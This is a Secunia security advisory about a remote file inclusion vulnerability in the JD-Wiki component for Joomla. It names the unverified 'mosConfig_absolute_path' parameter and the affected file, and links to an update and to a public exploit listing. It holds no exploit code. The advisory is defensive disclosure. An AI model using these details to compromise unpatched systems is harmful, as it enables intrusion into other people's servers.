Joomla JD-Wiki Component File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA21389

VERIFY ADVISORY:
http://secunia.com/advisories/21389/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
>From remote

SOFTWARE:
JD-Wiki 1.x (component for Joomla)
http://secunia.com/product/11256/

DESCRIPTION:
jank0 has reported a vulnerability in the JD-Wiki component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
components/com_jd-wiki/lib/tpl/default/main.php isn't properly
verified, before it is used to include files. This can be exploited
to include arbitrary files from external and local resources.

Successful exploitation requires that "register_globals" is enabled.

SOLUTION:
Update to version 1.0.3:
http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomladeveloping/frs.joomla_1_0_x.components/frs6415?dl=1

PROVIDED AND/OR DISCOVERED BY:
jank0

ORIGINAL ADVISORY:
http://www.joomladeveloping.org/component/option,com_jd-wp/Itemid,29/p,33/
http://milw0rm.com/exploits/2125

RECENT ARTICLE

RECENT POST